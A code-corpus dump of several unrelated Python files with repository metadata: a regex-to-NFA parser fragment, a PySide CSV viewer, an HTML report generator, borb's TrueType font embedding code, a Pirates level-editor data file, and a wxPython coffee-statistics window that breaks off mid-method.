_origin, _edge_o = self.parse_nfa()
if not_star:
self.states.append(_origin)
# if second param is a letter
if self.current_token.type in (LETTER_SMALL, STAR):
_dest, _edge_d = self.parse_nfa()
if not self.current_token.type == STAR:
self.states.append(_dest)
_end_state = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_end_state)
self.transitions.append(Transition(_origin.state_name, _edge_o, _dest.state_name))
self.transitions.append(Transition(_dest.state_name, _edge_d, _end_state.state_name))
return _origin, _end_state
# if second param is an operation
else:
# self.pop_token(COMMA)
_dest, _end_state = self.parse_nfa()
self.transitions.append(Transition(_origin.state_name, _edge_o, _dest.state_name))
return _origin, _end_state
# if first param is an operation
else:
_origin, _state_mid= self.parse_nfa()
self.pop_token(COMMA)
# if second param is a letter
if self.current_token.type in (LETTER_SMALL, STAR):
not_star = False
if not self.current_token.type == STAR:
not_star = True
_dest, _edge_d = self.parse_nfa()
if not_star:
self.states.append(_dest)
self.transitions.append(Transition(_state_mid.state_name, _edge_d, _dest.state_name))
return _origin, _dest
# if second param i sn operation
else:
_dest, _end_state = self.parse_nfa()
self.transitions.append(Transition(_state_mid.state_name, '_', _dest.state_name))
return _origin, _end_state
# If the current operation is repeat aka STAR
elif token.type == STAR:
self.pop_token(STAR)
self.pop_token(LPAR)
"""If the next token is a letter, meaning it will be looping only a letter"""
_origin, _edge_o = self.parse_nfa()
self.states.append(_origin)
self.transitions.append(Transition(_origin.state_name, _edge_o, _origin.state_name))
if self.current_token.type == COMMA:
self.pop_token(COMMA)
return _origin, '_'
# it the operation is an or aka PIPE
elif token.type == PIPE:
self.pop_token(PIPE)
self.pop_token(LPAR)
# if the next token is a letter
if self.current_token.type in (LETTER_SMALL, STAR):
not_star = False
if not self.current_token.type == STAR:
not_star = True
_origin, _edge_o = self.parse_nfa()
if not_star:
self.states.append(_origin)
_end_o = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_end_o)
self.transitions.append(Transition(_origin.state_name, _edge_o, _end_o.state_name))
# if the next token is a letter
if self.current_token.type in (LETTER_SMALL, STAR):
_dest, _edge_d = self.parse_nfa()
self.transitions.append(Transition(_origin.state_name, _edge_d, _end_o.state_name))
return _origin, _end_o
# if second param is an operation
else:
_dest, _end_d = self.parse_nfa()
_start = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_start)
_end_state = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_end_state)
self.transitions.append(Transition(_start.state_name, '_', _origin.state_name))
self.transitions.append(Transition(_start.state_name, '_', _dest.state_name))
self.transitions.append(Transition(_end_o.state_name, '_', _end_state.state_name))
self.transitions.append(Transition(_end_d.state_name, '_', _end_state.state_name))
return _start, _end_state
else:
_left_o, _left_d = self.parse_nfa()
self.pop_token(COMMA)
# if the next token is a letter
if self.current_token.type in (LETTER_SMALL, STAR):
not_star = False
if not self.current_token.type == STAR:
not_star = True
_right_o, _right_l = self.parse_nfa()
if not_star:
self.states.append(_right_o)
_right_d = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_right_d)
self.transitions.append(Transition(_right_o.state_name, _right_l, _right_d.state_name))
_start = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_start)
_end_state = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_end_state)
self.transitions.append(Transition(_start.state_name, '_', _left_o.state_name))
self.transitions.append(Transition(_start.state_name, '_', _right_o.state_name))
self.transitions.append(Transition(_left_d.state_name, '_', _end_state.state_name))
self.transitions.append(Transition(_right_d.state_name, '_',_end_state.state_name))
return _start, _end_state
# if second param is an operation
else:
_right_o, _right_d = self.parse_nfa()
_start = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_start)
_end_state = State('S' + str(self._state_number))
self._state_number += 1
self.states.append(_end_state)
self.transitions.append(Transition(_start.state_name, '_', _left_o.state_name))
self.transitions.append(Transition(_start.state_name, '_', _right_o.state_name))
self.transitions.append(Transition(_left_d.state_name, '_', _end_state.state_name))
self.transitions.append(Transition(_right_d.state_name, '_', _end_state.state_name))
return _start, _end_state
return self.states, self.transitions
def new_expression(self, _expression):
self.tokens_list = self.lexer.lex(_expression)
self.current_token = self.tokens_list[0]
def parse_file(self, list):
for item in list:
self.new_expression(str(item))
self.process_statement()
def parse_regex(self):
node = self.process_regex()
return node
| [
"I358097@fhict.nl"
] | I358097@fhict.nl |
31b625777e18824c02b07eb5c412b663cb49c233 | 2463fe693f203ba0b200da5a141bd34fa1a22677 | /src/cs.py | e24e7225068aae623f9a71ef365292a29dd3a8c6 | [] | no_license | spolydor/QT-CSV | 4a5b61b66be9e7a4a1944c23eb5dc35bfac9cff1 | 74bb48a29bf78fe159742f141a0ff2376237ab3b | refs/heads/master | 2020-04-12T23:05:28.624509 | 2016-02-09T13:50:13 | 2016-02-09T13:50:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 973 | py | import sys
from PySide.QtGui import QApplication, QWidget
from src import gui
import csv
class cs(QWidget):
def __init__(self, parent=None):
super().__init__(parent)
self.myForm = gui.Ui_Form()
self.myForm.setupUi(self)
self.myForm.el.clicked.connect(self.buttonHit) #Button verbinden mit Methode
def read(self):
with open('tcs.csv', newline='') as csvfile: #csv File oeffnen
txt = ""
spamreader = csv.reader(csvfile, delimiter=';', quotechar='|') #csv-File einlesen
for row in spamreader: #jede reihe durchgehen
txt += str(', '.join(row)) + "\n" #jede spalte der reihe auslesen
self.myForm.tb.setText(txt) #ausgelesenes csv-File in der GUI anzeigen/ausgeben
def buttonHit(self):
self.read() #Methode zum einlesen ausfuehren
if __name__ == "__main__":
app = QApplication(sys.argv)
c = cs()
c.show()
sys.exit(app.exec_()) | [
"spolydor@student.tgm.ac.at"
] | spolydor@student.tgm.ac.at |
3b10edd48459c6f5a59818de9043123639b629ff | ae71584162ad4e0e204948dda2d105a234949306 | /pagemaker.py | fafa218384bca13afc6eec7bcf47b2e255f24b49 | [
"Apache-2.0"
] | permissive | hjwp/fast-cluster-analysis | 8701579066d1bd4bb5b165ed4f875f33518fe11f | 91691b5ed4e2f36746b95cdb3a215afe762929a5 | refs/heads/master | 2021-01-21T05:59:07.499175 | 2013-12-04T09:40:31 | 2013-12-04T09:40:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,789 | py | #!/usr/bin/env python
import glob
def make_page(path, datapath):
homepagename = path + "/index.html"
f = open(homepagename, "w")
f.write("<!DOCTYPE html>\n")
f.write("<html>\n")
f.write(" <head>\n")
f.write(" <link rel=\"stylesheet\" type=\"text/css\" ")
f.write("href=\"assets/css/style.css\">\n")
f.write(" </head>\n")
f.write(" <body>\n")
f.write(" <a href='http://cernatschool.web.cern.ch'><img class='logo' src='assets/images/rect_web_large.png' /></a>\n")
f.write(" <h1>Basic Cluster Analysis</h1>\n")
f.write(" <h2>Dataset summary</h2>\n")
f.write(" <p>\n")
f.write(" <ul>\n")
f.write(" <li>Dataset path = '%s'</li>\n" % datapath)
f.write(" <li>Number of frames = %d</li>\n" % len(glob.glob(datapath + "/*.txt")))
f.write(" </ul>\n")
f.write(" </p>\n")
f.write(" <h2>Cluster properties</h2>\n")
f.write(" <table>\n")
f.write(" <caption>Fig. 1: Hits per cluster.</caption>\n")
f.write(" <tr><td><img src=\"hpc.png\" /></td></tr>\n")
f.write(" </table>\n")
f.write(" <table>\n")
f.write(" <caption>Fig. 2: Counts per cluster.</caption>\n")
f.write(" <tr><td><img src=\"cpc.png\" /></td></tr>\n")
f.write(" </table>\n")
f.write(" <table>\n")
f.write(" <caption>Fig. 3: Cluster radius (unweighted).</caption>\n")
f.write(" <tr><td><img src=\"cru.png\" /></td></tr>\n")
f.write(" </table>\n")
f.write(" <table>\n")
f.write(" <caption>Fig. 4: Cluster density (unweighted).</caption>\n")
f.write(" <tr><td><img src=\"cdu.png\" /></td></tr>\n")
f.write(" </table>\n")
f.write(" </body>\n")
f.write("</html>")
f.close()
| [
"Tom Whyntie"
] | Tom Whyntie |
145ae6eef5a9c9e0b2b158275aa8d8b2b504fd31 | 58df224689ab08c99359b1a6077d2fba3728dc61 | /lamda-ocr/merge-files/borb/pdf/canvas/font/simple_font/true_type_font.py | c0b6112c2b259f0d2c80c3ef2231a518f87ed377 | [] | no_license | LIT-Midas/LITHackathon | 2b286728c156d79d3f426f6d19b160a2a04690db | 7b990483dd48b91cf3ec3452b78ab67770da71af | refs/heads/main | 2023-08-13T05:22:59.373965 | 2021-08-16T01:09:49 | 2021-08-16T01:09:49 | 395,024,729 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 13,861 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The TrueType font format was developed by Apple Computer, Inc., and has been adopted as a standard font
format for the Microsoft Windows operating system. Specifications for the TrueType font file format are
available in Apple’s TrueType Reference Manual and Microsoft’s TrueType 1.0 Font Files Technical
Specification (see Bibliography).
"""
import typing
import zlib
from decimal import Decimal
from pathlib import Path
from borb.io.read.types import Decimal as pDecimal
from borb.io.read.types import Dictionary, List, Name, Stream, String
from borb.pdf.canvas.font.composite_font.cid_font_type_2 import CIDType2Font
from borb.pdf.canvas.font.composite_font.font_type_0 import Type0Font
from borb.pdf.canvas.font.simple_font.font_type_1 import Type1Font
from fontTools.agl import toUnicode # type: ignore [import]
from fontTools.pens.boundsPen import BoundsPen # type: ignore [import]
from fontTools.ttLib import TTFont # type: ignore [import]
class TrueTypeFont(Type1Font):
"""
A TrueType font dictionary may contain the same entries as a Type 1 font dictionary (see Table 111), with these
differences:
• The value of Subtype shall be TrueType.
• The value of Encoding is subject to limitations that are described in 9.6.6, "Character Encoding".
• The value of BaseFont is derived differently. The PostScript name for the value of BaseFont may be determined in one of two ways:
• If the TrueType font program's “name” table contains a PostScript name, it shall be used.
• In the absence of such an entry in the “name” table, a PostScript name shall be derived from the name by
which the font is known in the host operating system. On a Windows system, the name shall be based on
the lfFaceName field in a LOGFONT structure; in the Mac OS, it shall be based on the name of the FOND
resource. If the name contains any SPACEs, the SPACEs shall be removed.
"""
@staticmethod
def true_type_font_from_file(
path_to_font_file: Path,
) -> typing.Union["TrueTypeFont", "Type0Font"]:
"""
This function returns the PDF TrueTypeFont object for a given TTF file
"""
assert path_to_font_file.exists()
assert path_to_font_file.name.endswith(".ttf")
font_file_bytes: typing.Optional[bytes] = None
with open(path_to_font_file, "rb") as ffh:
font_file_bytes = ffh.read()
assert font_file_bytes
# read file
ttf_font_file: TTFont = TTFont(path_to_font_file)
# read cmap
cmap: typing.Optional[typing.Dict[int, str]] = ttf_font_file.getBestCmap()
assert cmap is not None
cmap_reverse: typing.Dict[str, int] = {}
for k, v in cmap.items():
if v in cmap_reverse:
cmap_reverse[v] = min(cmap_reverse[v], k)
else:
cmap_reverse[v] = k
glyph_order: typing.List[str] = [
x for x in ttf_font_file.glyphOrder if x in cmap_reverse
]
# if there are more than 256 glyphs, we need to switch to a Type0Font
if len(glyph_order) >= 256:
# fmt: off
type_0_font: Type0Font = TrueTypeFont._type_0_font_from_file(ttf_font_file)
type_0_font["DescendantFonts"][0]["FontDescriptor"][Name("FontFile2")] = TrueTypeFont._get_font_file_stream(font_file_bytes)
return type_0_font
# fmt: on
# build font
font: TrueTypeFont = TrueTypeFont()
font_name: str = TrueTypeFont._get_base_font(ttf_font_file)
font[Name("Name")] = Name(font_name)
font[Name("BaseFont")] = Name(font_name)
# build widths
units_per_em: pDecimal = pDecimal(ttf_font_file["head"].unitsPerEm)
if cmap is not None:
font[Name("FirstChar")] = pDecimal(0)
font[Name("LastChar")] = pDecimal(len(glyph_order))
font[Name("Widths")] = List()
for glyph_name in glyph_order:
w: typing.Union[pDecimal, Decimal] = (
pDecimal(ttf_font_file.getGlyphSet()[glyph_name].width)
/ units_per_em
) * Decimal(1000)
w = pDecimal(round(w, 2))
font["Widths"].append(w)
assert font[Name("FirstChar")] >= 0
assert (
font[Name("LastChar")] < 256
), "TrueType fonts with more than 256 glyphs are currently not supported."
font[Name("FontDescriptor")] = TrueTypeFont._get_font_descriptor(ttf_font_file)
font[Name("Encoding")] = Dictionary()
font["Encoding"][Name("BaseEncoding")] = Name("WinAnsiEncoding")
font["Encoding"][Name("Differences")] = List()
for i in range(0, len(glyph_order)):
font["Encoding"]["Differences"].append(pDecimal(i))
font["Encoding"]["Differences"].append(Name(glyph_order[i]))
# embed font file
font["FontDescriptor"][Name("FontFile2")] = TrueTypeFont._get_font_file_stream(
font_file_bytes
)
# return
return font
@staticmethod
def _get_font_file_stream(font_file_bytes: bytes) -> Stream:
font_stream: Stream = Stream()
font_stream[Name("Type")] = Name("Font")
font_stream[Name("Subtype")] = Name("TrueType")
font_stream[Name("Length")] = pDecimal(len(font_file_bytes))
font_stream[Name("Length1")] = pDecimal(len(font_file_bytes))
font_stream[Name("Filter")] = Name("FlateDecode")
font_stream[Name("DecodedBytes")] = font_file_bytes
font_stream[Name("Bytes")] = zlib.compress(font_file_bytes, 9)
return font_stream
@staticmethod
def _get_font_descriptor(ttf_font_file: TTFont) -> Dictionary:
# fmt: off
font_descriptor: Dictionary = Dictionary()
font_descriptor[Name("Type")] = Name("FontDescriptor")
font_descriptor[Name("FontName")] = String(TrueTypeFont._get_base_font(ttf_font_file))
font_descriptor[Name("FontStretch")] = Name("Normal") # TODO
font_descriptor[Name("FontWeight")] = pDecimal(400) # TODO
font_descriptor[Name("Flags")] = pDecimal(4) # TODO
# fmt: on
# determine FontBBox, CapHeight
units_per_em: float = ttf_font_file["head"].unitsPerEm
min_x: float = 1000
min_y: float = 1000
max_x: float = 0
max_y: float = 0
cap_height: typing.Optional[pDecimal] = None
glyph_set = ttf_font_file.getGlyphSet()
for glyph_name in ttf_font_file.glyphOrder:
pen = BoundsPen(glyph_set)
glyph_set[glyph_name].draw(pen)
if pen.bounds is None:
continue
# determine CapHeight
if glyph_name in "EFHIJLMNTZ" and cap_height is None:
cap_height = pDecimal(pen.bounds[3])
min_x = min(min_x, pen.bounds[0] / units_per_em * 1000)
min_y = min(min_y, pen.bounds[1] / units_per_em * 1000)
max_x = max(max_x, pen.bounds[2] / units_per_em * 1000)
max_y = max(max_y, pen.bounds[3] / units_per_em * 1000)
if cap_height is None:
cap_height = pDecimal(840)
font_descriptor[Name("FontBBox")] = List().set_can_be_referenced(False) # type: ignore[attr-defined]
font_descriptor["FontBBox"].append(pDecimal(min_x))
font_descriptor["FontBBox"].append(pDecimal(min_y))
font_descriptor["FontBBox"].append(pDecimal(max_x))
font_descriptor["FontBBox"].append(pDecimal(max_y))
# fmt: off
font_descriptor[Name("ItalicAngle")] = pDecimal(ttf_font_file["post"].italicAngle)
font_descriptor[Name("Ascent")] = pDecimal(ttf_font_file["hhea"].ascent / units_per_em * 1000)
font_descriptor[Name("Descent")] = pDecimal(ttf_font_file["hhea"].descent / units_per_em * 1000)
font_descriptor[Name("CapHeight")] = cap_height
font_descriptor[Name("StemV")] = pDecimal(297) # TODO
# fmt: on
return font_descriptor
@staticmethod
def _get_base_font(ttf_font_file: TTFont) -> str:
font_name: str = str(
[
x
for x in ttf_font_file["name"].names
if x.platformID == 3 and x.platEncID == 1 and x.nameID == 6
][0].string,
"latin1",
)
font_name = "".join(
[x for x in font_name if x.lower() in "abcdefghijklmnopqrstuvwxyz-"]
)
return font_name
@staticmethod
def _build_custom_cmap(ttf_font_file: TTFont) -> Stream:
cmap_prefix: str = """
/CIDInit /ProcSet findresource begin
12 dict begin
begincmap
/CIDSystemInfo
<< /Registry (Adobe)
/Ordering (UCS)
/Supplement 0
>> def
/CMapName /Adobe-Identity-UCS def
/CMapType 2 def
1 begincodespacerange
<0000> <FFFF>
endcodespacerange
"""
# 1 beginbfchar
# <0000> <0000>
# endbfchar
pairs: typing.List[typing.Tuple[str, str]] = []
for i, g in enumerate(ttf_font_file.glyphOrder):
g_unicode: str = toUnicode(g)
if len(g_unicode) == 0:
continue
g_hex: str = ""
if len(g_unicode) == 1:
g_hex = hex(ord(g_unicode))[2:]
if len(g_unicode) == 2:
g_hex = hex(ord(g_unicode[0]))[2:] + hex(ord(g_unicode[1]))[2:]
while len(g_hex) < 4:
g_hex = "0" + g_hex
i_hex: str = hex(i)[2:]
while len(i_hex) < 4:
i_hex = "0" + i_hex
pairs.append((i_hex, g_hex))
cmap_content: str = ""
for i in range(0, len(pairs), 100):
start_index: int = i
end_index: int = min(start_index + 100, len(pairs))
n: int = end_index - start_index
cmap_content += "%d beginbfchar\n" % n
for j in range(start_index, end_index):
cmap_content += "<%s> <%s>\n" % (pairs[j][0], pairs[j][1])
cmap_content += "endbfchar\n"
cmap_suffix: str = """
endcmap
CMapName currentdict /CMap defineresource pop
end
end
"""
bts: bytes = (cmap_prefix + cmap_content + cmap_suffix).encode("latin1")
to_unicode_stream = Stream()
to_unicode_stream[Name("DecodedBytes")] = bts
to_unicode_stream[Name("Bytes")] = zlib.compress(bts, 9)
to_unicode_stream[Name("Filter")] = Name("FlateDecode")
to_unicode_stream[Name("Length")] = pDecimal(len(bts))
return to_unicode_stream
@staticmethod
def _type_0_font_from_file(ttf_font_file: TTFont) -> "Type0Font":
type_0_font: Type0Font = Type0Font()
# build BaseFont
font_name: str = TrueTypeFont._get_base_font(ttf_font_file)
type_0_font[Name("BaseFont")] = Name(font_name)
# set Encoding
type_0_font[Name("Encoding")] = Name("Identity-H")
# set ToUnicode
type_0_font[Name("ToUnicode")] = TrueTypeFont._build_custom_cmap(ttf_font_file)
# build DescendantFont
descendant_font: CIDType2Font = CIDType2Font()
descendant_font[Name("Type")] = Name("Font")
descendant_font[Name("Subtype")] = Name("CIDFontType2")
descendant_font[Name("BaseFont")] = Name(font_name)
descendant_font[Name("FontDescriptor")] = TrueTypeFont._get_font_descriptor(
ttf_font_file
)
descendant_font[Name("DW")] = pDecimal(250)
# build W array
cmap = ttf_font_file["cmap"].getcmap(3, 1).cmap
glyph_set = ttf_font_file.getGlyphSet()
widths_array: List = List()
for cid, g in enumerate(ttf_font_file.glyphOrder):
glyph_width: float = 0
try:
glyph_width = glyph_set[cmap[ord(toUnicode(g))]].width
except:
glyph_width = pDecimal(0)
# set DW based on the width of a space character
if toUnicode(g) == " ":
descendant_font[Name("DW")] = pDecimal(glyph_width)
widths_array.append(pDecimal(cid))
widths_array.append(List())
widths_array[-1].append(pDecimal(glyph_width))
descendant_font[Name("W")] = widths_array
descendant_font[Name("CIDToGIDMap")] = Name("Identity")
# build CIDSystemInfo
# fmt: off
descendant_font[Name("CIDSystemInfo")] = Dictionary()
descendant_font[Name("CIDSystemInfo")][Name("Registry")] = String("Adobe")
descendant_font[Name("CIDSystemInfo")][Name("Ordering")] = String("Identity")
descendant_font[Name("CIDSystemInfo")][Name("Supplement")] = pDecimal(0)
# fmt: on
# add to DescendantFonts
type_0_font[Name("DescendantFonts")] = List()
type_0_font[Name("DescendantFonts")].append(descendant_font)
# return
return type_0_font
def __init__(self):
super(TrueTypeFont, self).__init__()
self[Name("Subtype")] = Name("TrueType")
def _empty_copy(self) -> "Font": # type: ignore [name-defined]
return TrueTypeFont()
def __deepcopy__(self, memodict={}):
# fmt: off
f_out: TrueTypeFont = super(TrueTypeFont, self).__deepcopy__(memodict)
f_out[Name("Subtype")] = Name("TrueType")
f_out._character_identifier_to_unicode_lookup: typing.Dict[int, str] = {k: v for k, v in self._character_identifier_to_unicode_lookup.items()}
f_out._unicode_lookup_to_character_identifier: typing.Dict[str, int] = {k: v for k, v in self._unicode_lookup_to_character_identifier.items()}
return f_out
# fmt: on
| [
"trevordino@gmail.com"
] | trevordino@gmail.com |
0fd9070e7532c771b9766a91098a73150dfb5d01 | d308fffe3db53b034132fb1ea6242a509f966630 | /pirates/leveleditor/worldData/shipUndeadInterceptor3.py | acc6d9d173dd1413dd886408aaa47773ffbce77e | [
"BSD-3-Clause"
] | permissive | rasheelprogrammer/pirates | 83caac204965b77a1b9c630426588faa01a13391 | 6ca1e7d571c670b0d976f65e608235707b5737e3 | refs/heads/master | 2020-03-18T20:03:28.687123 | 2018-05-28T18:05:25 | 2018-05-28T18:05:25 | 135,193,362 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,664 | py | # uncompyle6 version 3.2.0
# Python bytecode 2.4 (62061)
# Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)]
# Embedded file name: pirates.leveleditor.worldData.shipUndeadInterceptor3
from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1189043800.81gjeon': {'Type': 'Ship Part', 'Name': 'shipNavyInterceptor3', 'Category': '38: Phantom', 'File': '', 'Flagship': True, 'LogoOverride': '-1: Default', 'Objects': {'1255998720.0jubutler': {'Type': 'Spawn Node', 'AnimSet': 'default', 'AuraFX': 'None', 'Hpr': Point3(0.0, 0.0, 0.0), 'Min Population': '1', 'Patrol Radius': '12.0000', 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(1.543, -17.163, 22.11), 'PoseAnim': '', 'PoseFrame': '', 'PropFXLeft': 'None', 'PropFXRight': 'None', 'PropLeft': 'None', 'PropRight': 'None', 'Scale': VBase3(1.0, 1.0, 1.0), 'Spawnables': 'Area', 'Start State': 'Patrol', 'StartFrame': '0', 'Team': 'default', 'TrailFX': 'None', 'TrailLeft': 'None', 'TrailRight': 'None', 'VisSize': '', 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}, 'spawnTimeBegin': 0.0, 'spawnTimeEnd': 0.0}, '1255998848.0jubutler': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(18.012, 9.63, 23.531), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1255998848.0jubutler0': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-14.636, 3.658, 23.536), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1255998848.0jubutler1': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(-12.938, -34.07, 22.156), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}, '1255998848.0jubutler2': {'Type': 'Movement Node', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pause Chance': '100', 'Pause Duration': '30', 'Pos': Point3(14.147, -35.882, 22.071), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Color': (0.65, 0, 0, 1), 'Model': 'models/misc/smiley'}}}, 'Respawns': True, 'StyleOverride': '-1: Default', 'Team': 'EvilNavy', 'Visual': {'Model': ['models/shipparts/interceptorL3-geometry_High', 'models/shipparts/interceptorL3-collisions']}}}, 'Node Links': [['1255998720.0jubutler', '1255998848.0jubutler0', 'Bi-directional'], ['1255998720.0jubutler', '1255998848.0jubutler', 'Bi-directional'], ['1255998848.0jubutler', '1255998848.0jubutler0', 'Bi-directional'], ['1255998848.0jubutler0', '1255998848.0jubutler1', 'Bi-directional'], ['1255998848.0jubutler', '1255998848.0jubutler2', 'Bi-directional'], ['1255998848.0jubutler1', '1255998848.0jubutler2', 'Bi-directional']], 'Layers': {}, 'ObjectIds': {'1189043800.81gjeon': '["Objects"]["1189043800.81gjeon"]', '1255998720.0jubutler': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998720.0jubutler"]', '1255998848.0jubutler': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998848.0jubutler"]', '1255998848.0jubutler0': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998848.0jubutler0"]', '1255998848.0jubutler1': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998848.0jubutler1"]', '1255998848.0jubutler2': '["Objects"]["1189043800.81gjeon"]["Objects"]["1255998848.0jubutler2"]'}}
extraInfo = {'camPos': Point3(-173.398, -66.2502, 103.662), 'camHpr': VBase3(-74.1058, -20.5578, 0), 'focalLength': 1.39999997616, 'skyState': 2, 'fog': 0} | [
"33942724+itsyaboyrocket@users.noreply.github.com"
] | 33942724+itsyaboyrocket@users.noreply.github.com |
20b37e12c5d794237c6afff252c604939a813a3d | 8a36a30ab0fec1a676b5dbbee3677261acae7e7d | /Executable/Source (alle code)/Statistiekscherm.py | e77b72c006f5b81d85e5f9e4598c01687f81a371 | [] | no_license | sdevriend/WieHaaltErKoffie | d63781c69d51708c9c7b570c955e81affa47a6e6 | 2655bf2fb8ec9497c1b1ebb7db57458476d4640c | refs/heads/master | 2020-05-20T19:24:39.889639 | 2016-01-24T15:46:03 | 2016-01-24T15:46:03 | 46,859,153 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,999 | py | #!/usr/bin/env python
# -*- coding: CP1252 -*-
import wx
import gettext
import shutil
import time
import pylab
from creation import Creation
import os
from BakkieControlDatabase import BakkieControlDatabase
class Stats(wx.Frame):
def __init__(self, *args, **kwds):
if os.path.isfile("temp.png"):
os.remove("temp.png")
#print "BESTAAT"
self.locale = wx.Locale(wx.LANGUAGE_ENGLISH)
kwds["style"] = wx.DEFAULT_FRAME_STYLE
wx.Frame.__init__(self, *args, **kwds)
self.SetBackgroundColour((92,48,0))
self.savebutton = wx.Button(self, wx.ID_ANY, "Opslaan")
self.backbutton = wx.Button(self, wx.ID_ANY, "Terug")
self.backbutton.Bind(wx.EVT_BUTTON, self.onBack)
self.savebutton.Bind(wx.EVT_BUTTON, self.onSave)
self.radio_box_1 = wx.RadioBox(self, wx.ID_ANY, ("Soort grafiek"), choices=[("Bar"), ("Circle")], majorDimension=1, style=wx.RA_SPECIFY_ROWS)
pylab.figure(1, figsize=(6,6))
ax = pylab.axes([0.1, 0.1, 0.8, 0.8])
#names = ["Peter","John","James","Mark","Bart","Jude","Andrew","Simon"]
self.data = [0]
names= [""]
title = "Placeholder title"
self.graph = Creation(names, self.data, title)
#self.graph.buildBar()
perf_plot = 'temp.png'
names = self.getNames()
self.list_box_3 = wx.ListBox(self, wx.ID_ANY, choices=names,
style=wx.LB_MULTIPLE)
self.list_box_2 = wx.ListBox(self, wx.ID_ANY, choices=[("Wie haalt het vaakst?"), ("Wie is de grootste wanbetaler?"),
("Welke dranken worden het meest gehaald?"), ("Wie geeft het gulst?")])
self.radio_box_1.Bind(wx.EVT_RADIOBOX, self.onChange)
self.list_box_2.Bind(wx.EVT_LISTBOX, self.onUpdateData)
self.list_box_3.Bind(wx.EVT_LISTBOX, self.onUpdateNames)
sel = self.radio_box_1.GetSelection()
##print self.radio_box_1.GetString(sel)
self.__set_properties()
self.onUpdateNames(wx.EVT_LISTBOX)
self.onUpdateData(wx.EVT_LISTBOX)
self.__do_layout()
def onSave(self, event):
newname = str(time.strftime("%y_%m_%d_%H_%M_%S"))
newname+=".png"
shutil.copy("temp.png",newname)
def onBack(self, event):
self.Hide()
def getNames(self):
self.db = BakkieControlDatabase()
namelist = self.db.getUsers()
##print namelist
newnames = ['iedereen']
for tup in namelist:
newnames.append(tup[1])
return newnames
def onUpdateNames(self, event):
self.updateNames()
self.onUpdateData(wx.EVT_LISTBOX)
self.onChange(wx.EVT_RADIOBOX)
def updateNames(self):
selected = self.list_box_3.GetSelections()
if selected[0] == 0:
##print "IEDEREEN"
for name in range(self.list_box_3.GetCount()):
self.list_box_3.Select(name)
##print name
selected = self.list_box_3.GetSelections()[1:]
newnames = []
for selection in selected:
newnames.append(str(self.list_box_3.GetString(selection)))
##print newnames
self.graph.setNames(newnames)
##print self.graph.getNames()
data = self.graph.getData()
self.graph.setData(data[:len(newnames)])
#self.__do_layout()
def onUpdateData(self, event):
self.updateNames()
stat = self.list_box_2.GetSelection()
names = self.graph.getNames()
##print stat
if stat == 0:
freqs = self.db.getUserFreqs()
data_names = []
data_nums= []
newdata = []
for tup in freqs:
data_names.append(tup[0])
data_nums.append(tup[1])
##print data_names , "D_N"
newdata = []
for name in names:
if name in data_names:
namenum = data_names.index(name)
newdata.append(data_nums[namenum])
else:
newdata.append(0)
elif stat == 1:
debt = self.db.getUserSchulden()
#print debt
data_names = []
data_nums = []
newdata = []
for tup in debt:
data_names.append(tup[0])
data_nums.append(tup[1])
for name in names:
if name in data_names:
namenum = data_names.index(name)
newdata.append(data_nums[namenum])
else:
newdata.append(0)
elif stat == 2:
freqs = self.db.getFrequenties()
data_drinks = []
data_nums = []
newdata = []
for tup in freqs:
data_drinks.append(tup[0])
data_nums.append(tup[1])
self.graph.setNames(data_drinks)
newdata = data_nums
elif stat == 3:
loan = self.db.getOpenstaand()
#print loan
data_names = []
data_nums = []
newdata = []
for tup in loan:
data_names.append(tup[0])
data_nums.append(tup[1])
for name in names:
if name in data_names:
namenum = data_names.index(name)
newdata.append(data_nums[namenum])
else:
newdata.append(0)
#print self.graph.getData(),"ervoor"
self.graph.setData(newdata)
self.graph.setTitle(str(self.list_box_2.GetString(stat)))
#print self.graph.getData(),"erna"
self.onChange(wx.EVT_RADIOBOX)
def onChange(self, event):
graphtype = self.radio_box_1.GetString(self.radio_box_1.GetSelection())
if graphtype == "Circle":
self.graph.buildPie()
elif graphtype == "Bar":
self.graph.buildBar()
self.__do_layout()
def __set_properties(self):
self.SetTitle(("Statistieken"))
self.SetSize((900, 675))
self.radio_box_1.SetSelection(0)
self.list_box_3.SetSelection(0)
self.list_box_2.SetSelection(0)
#self.radio_box_1.SetBackgroudColour((46,24,0))
def __do_layout(self):
self.image = wx.Image("temp.png")
self.image.Rescale(666,500)
